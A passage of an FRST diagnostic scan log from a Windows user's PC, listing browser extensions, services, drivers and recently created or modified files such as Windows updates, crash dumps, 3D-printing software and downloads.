CHR Extension: (Google Kalendář) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\gmbgaklkmjakoegficnlkhebmhkjfich [2020-06-11]
CHR Extension: (Toby for Chrome) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\hddnkoipeenegfoeaoibdmnaalmgkpip [2020-10-15]
CHR Extension: (LastPass: Free Password Manager) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd [2020-10-23]
CHR Extension: (Google Keep – poznámky a seznamy) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\hmjkmjkepdijhoojdojkdfohbdgmmhki [2020-10-23]
CHR Extension: (Obvibase: an online database editor) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\hoddinokjifhganfcgkjmkkngljebjdj [2020-09-02]
CHR Extension: (WhatFont) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\jabopobgcpjmedljpbcaablpmlmfcogm [2019-04-02]
CHR Extension: (Speed Dial 2 New tab) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpfpebmajhhopeonhlcgidhclcccjcik [2020-04-16]
CHR Extension: (Auto Replay for YouTube™) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\kanbnempkjnhadplbfgdaagijdbdbjeb [2019-11-25]
CHR Extension: (Grammarly for Chrome) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbfnbcaeplbcioakkpcpgfkobkghlhen [2020-10-21]
CHR Extension: (Any.do Extension) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdadialhpiikehpdeejjeiikopddkjem [2019-04-02]
CHR Extension: (Zoom for Google Chrome) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\lajondecmobodlejlcjllhojikagldgd [2020-08-14]
CHR Extension: (Application Launcher for Drive (by Google)) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2020-10-12]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-03]
CHR Extension: (Any.do) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\ocgddccilgpeepgglnlpchkpgamkgmld [2019-04-02]
CHR Extension: (Chrome Media Router) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-10-08]
CHR Profile: C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\System Profile [2019-06-09]
CHR HKU\S-1-5-21-2643689781-145595849-2857803826-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - D:\Programy\Adobe\Acrobat\Acrobat\Browser\WCChromeExtn\WCChromeExtn.crx [2014-05-08]
==================== Services (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 AdAppMgrSvc; C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe [1262096 2016-04-19] (Autodesk, Inc -> Autodesk Inc.)
R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [83984 2018-12-16] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
S3 AdobeFlashPlayerUpdateSvc; C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-10-13] (Adobe Inc. -> Adobe)
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [744640 2016-10-12] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3739728 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3511376 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 CrypKey License; C:\Windows\system32\crypserv.exe [126976 2010-03-18] (CrypKey (Canada) Ltd.) [File not signed]
S3 GalaxyClientService; C:\Program Files (x86)\GOG Galaxy\GalaxyClientService.exe [1636936 2020-03-21] (GOG Sp. z o.o. -> GOG.com)
S3 GalaxyCommunication; C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe [6821960 2020-03-21] (GOG Sp. z o.o. -> GOG.com)
R2 IpOverUsbSvc; C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe [21304 2017-09-28] (Microsoft Corporation -> Microsoft Corporation)
R2 KiteService; C:\Program Files\Kite\KiteService.exe [141936 2020-10-14] (Manhattan Engineering Incorporated -> Kite)
S3 mracsvc; C:\Windows\System32\mracsvc.exe [20034712 2020-04-01] (Mail.Ru LLC -> LLC Mail.Ru)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2019-05-25] (Even Balance, Inc. -> )
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Test Signing Certificate -> Adobe Systems Incorporated) [File not signed]
S3 Te.Service; C:\Program Files (x86)\Windows Kits\10\Testing\Runtimes\TAEF\Wex.Services.exe [187904 2017-09-28] (Microsoft Corporation) [File not signed]
R2 TeamViewer; D:\Programy\TeamViewer\TeamViewer_Service.exe [13086224 2020-07-20] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [361824 2017-01-12] (Microsoft Corporation -> Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [119872 2017-01-12] (Microsoft Corporation -> Microsoft Corporation)
R2 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.4.2.222\WsAppService.exe [474768 2017-03-01] (Wondershare software CO., LIMITED -> Wondershare)
R2 NvTelemetryContainer; "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\plugin"
===================== Drivers (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S3 CH341SER_A64; C:\Windows\System32\Drivers\CH341S64.SYS [69016 2019-03-04] (Microsoft Windows Hardware Compatibility Publisher -> www.winchiphead.com)
R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [27552 2018-08-19] (Martin Malik - REALiX -> REALiX(tm))
R1 MpKslDrv; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{9477AFEC-D9BC-43C6-A41A-F6B028BF0EDC}\MpKslDrv.sys [47328 2020-10-22] (Microsoft Windows -> Microsoft Corporation)
S3 mracdrv; C:\Windows\System32\drivers\mracdrv.sys [19266680 2020-04-01] (Mail.Ru LLC -> LLC Mail.Ru)
R1 NetworkX; C:\Windows\System32\ckldrv.sys [30272 2010-03-19] (CrypKey (Canada) Inc. -> )
R1 npcap; C:\Windows\system32\DRIVERS\npcap.sys [60504 2020-04-04] (Insecure.Com LLC -> Insecure.Com LLC.)
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [46600 2017-02-10] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [274776 2017-01-12] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [117592 2017-01-12] (Microsoft Windows -> Microsoft Corporation)
S3 xb1usb; C:\Windows\System32\drivers\xb1usb.sys [42760 2019-03-31] (Windows Central Build Account - X -> Microsoft Corporation)
U4 npcap_wifi; no ImagePath
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One month (created) ===================
(If an entry is included in the fixlist, the file/folder will be moved.)
2020-10-23 10:44 - 2020-10-23 10:45 - 000030049 _____ C:\Users\Tomika\Desktop\FRST.txt
2020-10-23 10:44 - 2020-10-23 10:45 - 000000000 ____D C:\FRST
2020-10-23 10:42 - 2020-10-23 10:42 - 002299904 _____ (Farbar) C:\Users\Tomika\Desktop\FRST64.exe
2020-10-23 08:55 - 2020-10-23 08:55 - 000067246 _____ C:\Users\Tomika\Downloads\[SkT]Simon_Scarrow_-_serie_Quintus_Licinius_Cato_(2016-2020_CZ).torrent
2020-10-23 08:54 - 2020-10-23 08:54 - 000021972 _____ C:\Users\Tomika\Downloads\[SkT]Jozef_Karika__Cierny_kruh__Koniec_mafie_(2020)(SK).torrent
2020-10-23 08:54 - 2020-10-23 08:54 - 000021451 _____ C:\Users\Tomika\Downloads\[SkT]____Brian_W._Aldiss_-_Nonstop_(1989)(CZ).torrent
2020-10-23 08:40 - 2020-10-23 09:27 - 843273297 _____ C:\Users\Tomika\Downloads\Flanagan, John - Hranicaruv ucen 10 - Cisar Nihon-Dzinu - (Audiokniha).rar.zip
2020-10-22 19:55 - 2020-10-22 20:09 - 061341305 _____ C:\Users\Tomika\Downloads\Flanagan, John - Hranicaruv ucen 10 - Cisar Nihon-Dzinu - (Audiokniha).rar.zip.crdownload
2020-10-19 21:47 - 2020-10-19 21:47 - 001013608 _____ C:\Users\Tomika\Downloads\sous vide review.pdf
2020-10-19 20:04 - 2020-10-19 20:04 - 000275000 _____ C:\Windows\Minidump\101920-50875-01.dmp
2020-10-17 19:31 - 2020-10-17 19:31 - 000420752 _____ C:\Windows\Minidump\101720-31906-01.dmp
2020-10-13 19:47 - 2020-09-30 09:20 - 000135240 _____ (Microsoft Corporation) C:\Windows\system32\gpapi.dll
2020-10-13 19:47 - 2020-09-30 05:04 - 003332608 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2020-10-13 19:47 - 2020-09-30 04:56 - 000445440 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2020-10-13 19:47 - 2020-09-30 04:48 - 001118720 _____ (Microsoft Corporation) C:\Windows\system32\gpedit.dll
2020-10-13 19:47 - 2020-09-30 04:15 - 001381888 _____ (Microsoft Corporation) C:\Windows\system32\gpsvc.dll
2020-10-13 19:47 - 2020-09-29 07:32 - 000115616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gpapi.dll
2020-10-13 19:47 - 2020-09-29 06:11 - 003642368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2020-10-13 19:47 - 2020-09-29 06:00 - 000324096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2020-10-13 19:47 - 2020-09-29 05:54 - 001067520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gpedit.dll
2020-10-13 19:47 - 2020-09-24 08:47 - 000120832 _____ (Microsoft Corporation) C:\Windows\system32\userenv.dll
2020-10-13 19:47 - 2020-09-24 08:43 - 002535968 _____ (Microsoft Corporation) C:\Windows\system32\msxml6.dll
2020-10-13 19:47 - 2020-09-24 08:36 - 007363320 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2020-10-13 19:47 - 2020-09-24 08:36 - 002173392 _____ (Microsoft Corporation) C:\Windows\system32\combase.dll
2020-10-13 19:47 - 2020-09-24 08:01 - 025759232 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2020-10-13 19:47 - 2020-09-24 07:01 - 000098104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\userenv.dll
2020-10-13 19:47 - 2020-09-24 07:00 - 001902240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml6.dll
2020-10-13 19:47 - 2020-09-24 06:53 - 001561296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\combase.dll
2020-10-13 19:47 - 2020-09-24 06:28 - 002914304 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2020-10-13 19:47 - 2020-09-24 06:25 - 000581120 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2020-10-13 19:47 - 2020-09-24 06:25 - 000088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2020-10-13 19:47 - 2020-09-24 06:16 - 005500416 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2020-10-13 19:47 - 2020-09-24 06:14 - 000785408 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2020-10-13 19:47 - 2020-09-24 06:13 - 020293632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2020-10-13 19:47 - 2020-09-24 06:04 - 000517120 _____ (Microsoft Corporation) C:\Windows\system32\cmdial32.dll
2020-10-13 19:47 - 2020-09-24 05:57 - 000498176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2020-10-13 19:47 - 2020-09-24 05:55 - 000064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2020-10-13 19:47 - 2020-09-24 05:54 - 002306048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2020-10-13 19:47 - 2020-09-24 05:53 - 000477696 _____ (Microsoft Corporation) C:\Windows\system32\puiobj.dll
2020-10-13 19:47 - 2020-09-24 05:53 - 000092672 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2020-10-13 19:47 - 2020-09-24 05:52 - 000145408 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
2020-10-13 19:47 - 2020-09-24 05:51 - 000315904 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2020-10-13 19:47 - 2020-09-24 05:47 - 001033216 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2020-10-13 19:47 - 2020-09-24 05:47 - 000653824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2020-10-13 19:47 - 2020-09-24 05:41 - 000262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2020-10-13 19:47 - 2020-09-24 05:40 - 015494144 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2020-10-13 19:47 - 2020-09-24 05:39 - 000728064 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2020-10-13 19:47 - 2020-09-24 05:39 - 000484352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cmdial32.dll
2020-10-13 19:47 - 2020-09-24 05:39 - 000381952 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2020-10-13 19:47 - 2020-09-24 05:38 - 000809472 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2020-10-13 19:47 - 2020-09-24 05:37 - 002132992 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2020-10-13 19:47 - 2020-09-24 05:33 - 003631616 _____ (Microsoft Corporation) C:\Windows\system32\tquery.dll
2020-10-13 19:47 - 2020-09-24 05:32 - 000392192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssph.dll
2020-10-13 19:47 - 2020-09-24 05:32 - 000272896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchProtocolHost.exe
2020-10-13 19:47 - 2020-09-24 05:31 - 000076800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2020-10-13 19:47 - 2020-09-24 05:30 - 000279552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2020-10-13 19:47 - 2020-09-24 05:30 - 000128000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iepeers.dll
2020-10-13 19:47 - 2020-09-24 05:29 - 002750464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tquery.dll
2020-10-13 19:47 - 2020-09-24 05:27 - 000880640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2020-10-13 19:47 - 2020-09-24 05:27 - 000230400 _____ (Microsoft Corporation) C:\Windows\system32\profsvc.dll
2020-10-13 19:47 - 2020-09-24 05:26 - 004859904 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2020-10-13 19:47 - 2020-09-24 05:26 - 000699392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssvp.dll
2020-10-13 19:47 - 2020-09-24 05:26 - 000110080 _____ (Microsoft Corporation) C:\Windows\system32\fdSSDP.dll
2020-10-13 19:47 - 2020-09-24 05:25 - 004112384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2020-10-13 19:47 - 2020-09-24 05:23 - 000230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2020-10-13 19:47 - 2020-09-24 05:22 - 000696320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2020-10-13 19:47 - 2020-09-24 05:22 - 000333312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2020-10-13 19:47 - 2020-09-24 05:21 - 002058752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2020-10-13 19:47 - 2020-09-24 05:20 - 013872640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2020-10-13 19:47 - 2020-09-24 05:18 - 000172032 _____ (Microsoft Corporation) C:\Windows\system32\fdWSD.dll
2020-10-13 19:47 - 2020-09-24 05:15 - 001566720 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2020-10-13 19:47 - 2020-09-24 05:13 - 000092672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fdSSDP.dll
2020-10-13 19:47 - 2020-09-24 05:10 - 000133120 _____ (Microsoft Corporation) C:\Windows\system32\mssprxy.dll
2020-10-13 19:47 - 2020-09-24 05:08 - 000905728 _____ (Microsoft Corporation) C:\Windows\system32\SearchIndexer.exe
2020-10-13 19:47 - 2020-09-24 05:08 - 000145920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fdWSD.dll
2020-10-13 19:47 - 2020-09-24 05:07 - 002551808 _____ (Microsoft Corporation) C:\Windows\system32\mssrch.dll
2020-10-13 19:47 - 2020-09-24 05:07 - 001099264 _____ (Microsoft Corporation) C:\Windows\system32\localspl.dll
2020-10-13 19:47 - 2020-09-24 05:06 - 000866304 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2020-10-13 19:47 - 2020-09-24 05:04 - 004387840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2020-10-13 19:47 - 2020-09-24 05:03 - 000801280 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2020-10-13 19:47 - 2020-09-24 05:01 - 001920512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssrch.dll
2020-10-13 19:47 - 2020-09-24 05:00 - 001341952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2020-10-13 19:47 - 2020-09-24 05:00 - 000711168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchIndexer.exe
2020-10-13 19:47 - 2020-09-24 04:59 - 000710656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2020-10-13 19:47 - 2020-09-24 04:55 - 003826176 _____ (Microsoft Corporation) C:\Windows\system32\rdpcore.dll
2020-10-13 19:47 - 2020-09-24 04:55 - 003551744 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2020-10-13 19:47 - 2020-09-24 04:53 - 001684992 _____ (Microsoft Corporation) C:\Windows\system32\workfolderssvc.dll
2020-10-13 19:47 - 2020-09-24 04:52 - 003278848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpcore.dll
2020-10-13 19:47 - 2020-09-15 09:06 - 001311776 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2020-10-13 19:47 - 2020-09-15 08:57 - 000325320 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2020-10-13 19:47 - 2020-09-15 07:24 - 000245752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2020-10-13 19:47 - 2020-09-15 06:49 - 000281088 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netbt.sys
2020-10-13 19:47 - 2020-09-15 06:15 - 001040384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2020-10-13 19:47 - 2020-09-11 18:31 - 000367616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\es.dll
2020-10-13 19:47 - 2020-09-11 11:39 - 000288768 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ks.sys
2020-10-13 19:47 - 2020-09-11 10:23 - 000516608 _____ (Microsoft Corporation) C:\Windows\system32\es.dll
2020-10-13 19:47 - 2020-09-11 01:49 - 001370680 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2020-10-13 19:47 - 2020-09-10 23:27 - 000564224 _____ (Microsoft Corporation) C:\Windows\system32\apphelp.dll
2020-10-13 19:47 - 2020-09-10 22:51 - 000642560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apphelp.dll
2020-10-13 19:47 - 2020-09-10 22:51 - 000005632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shimeng.dll
2020-10-13 19:47 - 2020-09-10 22:20 - 001757184 _____ (Microsoft Corporation) C:\Windows\system32\GdiPlus.dll
2020-10-13 19:47 - 2020-09-10 22:14 - 002349056 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2020-10-13 19:47 - 2020-09-10 22:11 - 001088512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2020-10-13 19:47 - 2020-09-10 22:02 - 001495040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\GdiPlus.dll
2020-10-13 19:47 - 2020-09-10 21:56 - 001551360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll
2020-10-13 19:47 - 2020-09-10 03:24 - 000353792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrd3x40.dll
2020-10-13 19:34 - 2020-10-13 19:34 - 000275103 _____ C:\Users\Tomika\Downloads\STV-deti-2xA4_Slovenská-aikido-asociácia.pdf
2020-10-12 20:26 - 2020-10-12 20:26 - 000372610 _____ C:\Users\Tomika\Downloads\Vagnerová, Jana - Pandemie .epub
2020-10-10 11:10 - 2020-10-10 11:10 - 000000000 ____D C:\Users\Tomika\Downloads\menu_simple
2020-10-09 19:49 - 2020-10-09 21:16 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\PrusaSlicer
2020-10-09 19:31 - 2020-10-09 19:31 - 000000991 _____ C:\Users\Public\Desktop\PrusaSlicer.lnk
2020-10-09 19:31 - 2020-10-09 19:31 - 000000991 _____ C:\ProgramData\Desktop\PrusaSlicer.lnk
2020-10-09 19:31 - 2020-10-09 19:31 - 000000986 _____ C:\Users\Public\Desktop\Pronterface.lnk
2020-10-09 19:31 - 2020-10-09 19:31 - 000000986 _____ C:\ProgramData\Desktop\Pronterface.lnk
2020-10-09 19:31 - 2020-10-09 19:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Prusa3D
2020-10-09 19:31 - 2020-10-09 19:31 - 000000000 ____D C:\Program Files\Prusa3D
2020-10-09 19:31 - 2015-09-23 13:12 - 000000625 _____ C:\Users\Tomika\printrunconf.ini
2020-10-09 19:30 - 2020-10-09 19:30 - 380393624 _____ (Prusa Research a.s. ) C:\Users\Tomika\Downloads\prusa3d_win_2_2_9_1.exe
2020-10-09 13:47 - 2020-10-09 13:47 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Mitov
2020-10-09 13:47 - 2020-10-09 13:47 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visuino
2020-10-09 13:46 - 2020-10-09 13:46 - 000000000 ____D C:\Users\Tomika\Downloads\Visuino_Component_SDK_7_8_3_69
2020-10-09 13:46 - 2020-10-09 13:46 - 000000000 ____D C:\Users\Tomika\Downloads\Visuino_7_8_3_69
2020-10-09 13:46 - 2020-10-09 13:46 - 000000000 ____D C:\Program Files (x86)\Mitov
2020-10-09 11:44 - 2020-10-09 11:44 - 010153506 _____ C:\Users\Tomika\Downloads\tandt4-two-buttons-or-rotary encoder=infinite-functions(menu+oled-display).zip
2020-10-07 22:00 - 2020-10-07 22:02 - 384825382 _____ C:\Users\Tomika\Downloads\Visuino_Component_SDK_7_8_3_69.zip
2020-10-07 22:00 - 2020-10-07 22:00 - 136887134 _____ C:\Users\Tomika\Downloads\Visuino_7_8_3_69.zip
2020-10-03 09:52 - 2020-10-03 09:52 - 000420816 _____ C:\Windows\Minidump\100320-13437-01.dmp
2020-10-02 19:07 - 2020-10-03 01:24 - 000000000 ____D C:\Program Files (x86)\Mozilla Thunderbird
2020-09-26 21:45 - 2020-09-26 21:45 - 000000000 ____D C:\Users\Tomika\AppData\LocalLow\InxileEntertainment
2020-09-26 20:09 - 2020-09-26 20:09 - 000000535 _____ C:\Users\Public\Desktop\Wasteland 3.lnk
2020-09-26 20:09 - 2020-09-26 20:09 - 000000535 _____ C:\ProgramData\Desktop\Wasteland 3.lnk
2020-09-25 16:20 - 2020-09-25 16:20 - 000000864 _____ C:\Users\Tomika\Desktop\They Are Billions.lnk
2020-09-23 19:01 - 2020-09-23 19:01 - 000420816 _____ C:\Windows\Minidump\092320-26531-01.dmp
==================== One month (modified) ==================
(If an entry is included in the fixlist, the file/folder will be moved.)
2020-10-23 10:08 - 2016-05-02 19:14 - 000003596 _____ C:\Windows\system32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2643689781-145595849-2857803826-1001
2020-10-23 10:02 - 2020-01-15 19:52 - 000000000 ____D C:\Program Files\Blender Foundation
2020-10-23 10:02 - 2019-09-04 21:41 - 000001135 _____ C:\Users\Tomika\Desktop\blender.lnk
2020-10-23 10:02 - 2019-09-04 21:41 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Blender
2020-10-23 09:58 - 2017-11-21 00:03 - 000000000 ____D C:\Users\Tomika\AppData\LocalLow\Mozilla
2020-10-23 09:56 - 2016-06-10 09:37 - 000000000 ____D C:\Users\Tomika\AppData\Local\Autodesk
2020-10-23 09:49 - 2016-05-04 19:07 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\qBittorrent
2020-10-23 08:30 - 2020-01-01 16:07 - 000003088 _____ C:\Windows\system32\Tasks\Driver Booster Scheduler
2020-10-23 08:30 - 2020-01-01 16:07 - 000003080 _____ C:\Windows\system32\Tasks\Driver Booster Update
2020-10-23 08:30 - 2020-01-01 16:07 - 000002836 _____ C:\Windows\system32\Tasks\Driver Booster SkipUAC (Tomika)
2020-10-23 08:28 - 2017-09-16 12:00 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\WTablet
2020-10-23 08:28 - 2016-05-15 19:42 - 000000000 ____D C:\ProgramData\NVIDIA
2020-10-23 08:28 - 2016-05-02 19:13 - 000000000 __SHD C:\Users\Tomika\IntelGraphicsProfiles
2020-10-22 23:35 - 2019-10-04 15:37 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData
2020-10-22 23:35 - 2019-10-04 15:37 - 000000000 ___HD C:\ProgramData\Documents\AdobeGCData
2020-10-22 23:00 - 2013-09-30 06:20 - 000865068 _____ C:\Windows\system32\PerfStringBackup.INI
2020-10-22 23:00 - 2013-08-22 15:36 - 000000000 ____D C:\Windows\Inf
2020-10-22 22:46 - 2018-05-09 19:01 - 000000000 ____D C:\Users\Tomika\Downloads\mil
2020-10-22 22:11 - 2013-08-22 17:36 - 000000000 ____D C:\Windows\system32\NDF
2020-10-22 00:39 - 2016-05-02 19:13 - 000795000 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2020-10-21 20:09 - 2019-05-29 18:57 - 000000000 ____D C:\Program Files\Mozilla Firefox
2020-10-21 20:08 - 2018-12-09 17:49 - 000000948 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2020-10-21 20:08 - 2016-05-03 12:54 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2020-10-21 19:55 - 2016-05-02 19:23 - 000002244 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2020-10-21 19:55 - 2016-05-02 19:23 - 000002203 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2020-10-21 19:55 - 2016-05-02 19:23 - 000002203 _____ C:\ProgramData\Desktop\Google Chrome.lnk
2020-10-20 20:06 - 2013-08-22 15:25 - 000000187 _____ C:\Windows\win.ini
2020-10-20 20:05 - 2013-08-22 16:45 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2020-10-19 22:51 - 2016-05-02 19:09 - 000000000 ____D C:\Users\Tomika
2020-10-19 20:04 - 2020-03-13 18:40 - 1137619341 _____ C:\Windows\MEMORY.DMP
2020-10-19 20:04 - 2016-05-03 12:49 - 000000000 ____D C:\Windows\Minidump
2020-10-18 23:11 - 2020-05-05 19:43 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\discord
2020-10-17 15:03 - 2020-03-23 23:02 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Code
2020-10-17 12:48 - 2020-03-23 23:17 - 000000000 ____D C:\Users\Tomika\.pylint.d
2020-10-17 12:03 - 2020-09-08 21:25 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Kite
